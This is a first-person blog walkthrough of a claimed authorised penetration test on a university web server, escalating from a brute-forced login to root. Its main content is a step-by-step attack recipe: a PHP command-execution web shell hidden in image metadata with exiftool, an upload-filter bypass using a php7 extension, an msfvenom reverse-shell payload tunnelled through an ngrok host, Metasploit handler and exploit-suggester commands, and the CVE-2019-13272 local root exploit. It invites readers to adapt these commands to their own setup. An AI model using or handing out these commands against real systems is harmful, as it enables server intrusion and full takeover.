BOOK THIS SPACE FOR AD
ARTICLE ADHi all! How are you guys? I hope everything is fine. This time, I want to share my experience in getting root access on a Linux server.
It all started when I was asked to conduct a penetration test of the university system by the head of the university. I was given the task of identifying vulnerabilities on several major websites and other related sites. After one year, I discovered various critical, high, and medium level vulnerabilities. I reported it without any exploits, until now.
However, on my last chance this year, I decided to perform an exploit on the last site I managed to hack. The site is www.site.com.
This article is also similar to the article below.
Before starting, I did Reconnaissance to get information regarding the site. Since the site is protected by WAF, I can’t bruteforce the directory. I did a manual search and found documentation on the site which I then downloaded. I tested all the input forms and found that the login form has no rate limit. However, when I tried bruteforce directory with ffuf, I was immediately blocked. :(.
Once it was no longer blocked, I decided to bruteforce the login page by combining information from the documentation with the rockyou wordlist. I noticed that if the username is valid but the password is incorrect, the site will display “incorrect password”. But if there is no valid username, it will display “incorrect username or password”. With this information, I focused on finding a valid username and bruteforced the password using Burp Suite. For further details, see the official PortSwigger article.
After waiting quite a long time, I finally got a valid password and immediately logged in.
After successfully logging in, I looked for an upload form that could be used to upload the backdoor shell. However, it turned out to be very difficult. Here is a list of what I tried.
file.jpg >> 200 ok ( uploaded )
file.php >> 200 ok ( invalid extensions )
file .jpg.php >> 200 ok (auto rename file.jpg )
file.phtml >> 200 ok ( invalid extensions )
file.shtml >> 200 ok ( invalid extensions )
file.php5 >> 200 ok ( invalid extensions )
file.php7 >> 200 ok (file downloaded)
When using PHP7, I get an auto-downloaded file response. After analyzing, I found that large PHP7 files will be downloaded automatically, but if the file is under 1 MB and extensions is php7, then the file will be uploaded and saved. To work around this, I used Exiftool to insert a backdoor shell into the photo. For the backdoor shell.
<?php system($_GET[‘cmd’]); ?>
Then the command using exiftool becomes
exiftool -Comment=”<?php system($_GET[‘cmd’]); ?>” file.jpg [ file.jpg adjusted to the photo files you have ]
Before uploading it I made sure intercept was on in burpsuite, and when uploading I changed the file extension which was originally jpeg to php7. After it was successfully uploaded, I immediately opened it and added “?cmd” behind it [ www.site.com/gallery/for-rce.php?cmd=whoami ]. I got an Apache user running on the server.
Using wget, I immediately downloaded the larger backdoor shell and accessed it.
wget github.com/shell-backdoor [ backdoor web shell link tailored to what you have ]
However, I get a red directory, which means I can’t do anything because of user limitations.
Since I intended to go further, I ran Metasploit on my terminal and prepared the payload for the Linux server with Msfvenom. Before that, I was running Ngrok.
ngrok tcp 1337
And create the payload.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.tcp.ap.ngrok.io [*set with your own without tcp://] LPORT=11589 [ *set with your port in ngrok ]-f elf -o backcon.elf
success generate payloadBack to metasploit.
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 1337 [ *set with your port before run ngrok, in my case is 1337 “ngrok tcp 1337”]
exploit
After that I uploaded the .elf file that was created earlier using the backdoor shell, and in the backdoor shell I used the command feature to change access the file.
chmod +x backcon.elf
./backcon.elf
And i got the response.
Because my goal was to exploit the server and gain root access, I used a local exploit suggester. On metasploit type.
background
use post/multi/recon/local_exploit_suggester
set session 1
run
as you can see we will use the green module which means vuln, to use it.
use [green module]
show options [to see what needs to be set]
Here I will use exploit/linux/local/su_login.
use exploit/linux/local/su_login
set LHOST [ adjust it to your server ]
set session 1
run
Unfortunately the exploit failed :(.
Here I use another method, i will use CVE-2019–13272. I downloaded and uploaded the file, back to metasploit I typed.
shell
python -c ‘import pty; pty.spawn(“/bin/sh”)’
gcc -s CVE-2019–13272.c -o gotroot
./gotroot
And after running it I get root access as shown below.
from apache user to root userI immediately followed up on this by making a detailed report to the developer. If there is something you don’t understand because the explanation is not very detailed, don’t hesitate to ask.
Maybe that’s all from me, hopefully it can be a reference for you. I’m RyuuKhagetsu, see you in next article.